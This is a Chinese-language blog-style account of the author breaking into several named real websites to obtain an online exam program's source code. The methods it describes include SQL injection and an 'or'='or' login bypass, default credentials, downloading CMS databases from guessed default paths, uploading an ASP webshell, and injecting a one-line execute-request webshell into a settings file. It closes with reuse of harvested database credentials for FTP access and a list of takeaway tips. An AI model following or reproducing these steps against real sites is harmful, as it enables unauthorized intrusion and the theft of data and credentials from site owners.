我朋友对http://www.059466.com/里的模拟考试程序非常感兴趣，要源码。
要源码咱就……
整体看




首页应该自己编写的。点连接加’测试注入。发现过滤了，不过过滤了post和get。cookie应该没过滤。。我也没尝试。换种方法再说。



先不管了，找下后台。看这个网站有点像企业站。就随便加了个manage目录。。没想到还真有。界面也非常丑陋。http://www.059466.com/manage/login.asp估计是自己写的。

‘or’=’or’
进去了



看这菜单。寒心。这样的管理功能能拿到webshell?郁闷。



于是我犯了一个错误。以为这就是后台。于是我就旁注去了。如果我认真想下前台的功能，就不会这样犯了。这是后话。
旁注嘛，打开http://www.114best.com/ip/114?w=www.059466.com
共检测到 36 个网站与www.059466.com在同一ip服务器上
找啊找啊。http://www.20030.cn/ 的站点。加admin跳后台



木目下载系统。百度一下。下载一份。查看默认数据库。最后用admin admin登陆进去- -
管理菜单还是弱弱的




技术不行，拿不到后台。没考虑用一句话方式。。。
换站继续http://www.ylpa.net/ 这个也是 在版权处看到powered by wrmps v5.0.2 2006-2009 wangren inc. 下载一份。按照默认库下载



可是，本地打开傻眼。



wm_password 才十位。。啊们。。。看样子应该是md5后取十位了 看下login.asp代码 找到md5 模块
md5=left(lcase(wordtohex(b) & wordtohex(c)),10)
果然。。。请教了bs大叔后，知道除了自己写程序跑密码就没其他办法，不过事后我想通过cookie欺骗不知道是否能行？哪位老大知道的说下~
最终也是放弃了。虽然……
继续找站。http://www.huayi2008.com
常规方法没效果。随便点连接，看到了友情连接。



原来还有sc目录。。。进去看下



注册登陆。后来发现其实不注册也行，下面有 非会员直接进入 的连接




还是科讯的产品。。昏了。。直接上传asp木马呢？？？事实告诉我我rp还是不错的。

上传完毕。可是地址呢。。。竟然没回显。。。晕。现在有个思路就是自己下载一份系统。然后观看上传文件的目录以及文件名的规律。于是百度下 科汛在线输出产品 找到官方网站
http://www.kesion.com/twcs/v2008/ 还真的是科汛的产品。。。发现是收费的。。我xxx。郁闷
不过订单连接。。



查看订单，http://www.huayi2008.com/sc/showorder.asp?id=359 加’ 报错。加and 1=1 正常。加and 1=2出错。晕。注入点。。。
用工具吧。密码没加密 很好。username:huayi2008com
password:36399796 用这账号登陆就是admin权限。
订单管理果然看到我们的上传文件。



http://www.huayi2008.com/sc/system/uploadimages/12.asp
连接~两分钟后发现shell不见了。。。难道被管理员发现了？再上传。。。再不见。。原来是杀软。。这webshell还是免杀的。。太变态的杀毒软件了吧。。。
提权。？。失败了。。。真的没什么思路。serv-u等第三方软件都没安装。。就安装安全软件。c d e 都不可读。那我们的最开始目标呢？难道不要那源码了？
绕啊绕啊绕回来
郁闷 继续看原来的站。http://www.059466.com/ 哦。前台还有留言板。那manage下面为什么没。难道还有真正的后台不成？这是假的》？http://www.059466.com/admin_login.asp 晕。随便看下真的还有。。。这个难办了。没账号密码…
在留言板我看到一张图片。一个细节，决定这次的成功。



高贝留言？？？解释是？高贝声音留言？？ - -显然不是。这应该是一个cms吧。百度下载。




果然。。。找到默认数据库。database\gaobeisys_v1x.mdb



访问目标站。
晕了。改数据库了？这时我注意到database\gaobeisys_v1x.mdb
v1x.mdb 1.0的版本？那如果他用2.0呢 不就是database\gaobeisys_v2x.mdb
…果然。！



用迅雷下载~啦啦啦啦啦啦。。。本地看密码.跑md5。。耶。出来了、
进后台发


现这系统够强大。



有数据库备份~太好了。按照我们常规的思路就是上传图片马，备份生成asp。好。不过又是一个难题。



竟然是空白页面。



看来upload.asp被管理员删除了。。。这下郁闷了。不过有数据库备份我们可以通过插一句话来。通过查看高贝的源文件。我发现一个重要文件。\include\gaobei_setup.asp





和后台的系统几本设置一样。就是保存在asp文件。这样我们就有机可乘！
<%
gaobei_title= "高贝系统 v 2.0"
我们把高贝系统 v 2.0替换成 “%><%execute request(“f**k”)<%gaobei_f**k=”这样就完全闭合了。然后用一句话连接\include\gaobei_setup.asp.成了！（这步感谢小帅给我那个laker2最小马。郁闷了很久！也鄙视他改主页 =_=）…
进入后我随便看了下发现有个bbs/的目录，看文件结构是phpwind.我们看下其数据库
data/sql_config.php



这时我突然想到一个问题。就是我们购买虚拟机的时候，ftp的账号和mysql账号密码都是一致的！包括虚拟机的管理页面…果然 登陆ftp成功



有ftp..要啥有啥。。嘿嘿。。。
好了好了。。。就是这样了。总结下。
1. 由于第一次找了一个错误的低功能的后台让我走错了路，旁注失败。服务器权限太死。谁有兴趣提权的找我吖！
2. 在旁注过程中看到了一个不算很新的密码加密算法。md5后取前十位，可以借鉴。毕竟现在md5破解弱智密码很简单。如果取前十位。那就难了。
3. http://www.huayi2008.com/chinese/index.asp 看到友情连接，链接到sc/目录。导致此站点的崩溃。
4. 提权-失败。服务器开启3389端口
5. 回到原点，认真看前台，发现功能强大，假后台功能弱小。
6. 看cms的图片分辨出是用哪个cms系统。（这点非常好用！因为你可以改cms的文字，但是有些管理员懒得改图片，要ps掉 版权。以前也用过！）然后通过版本得到数据库路径。
7. 在去掉上传文件的情况下通过一句话得到webshell。最后打包下载。
8. 最后通过查看phpwind的mysql配置文件，得到了ftp的账号密码。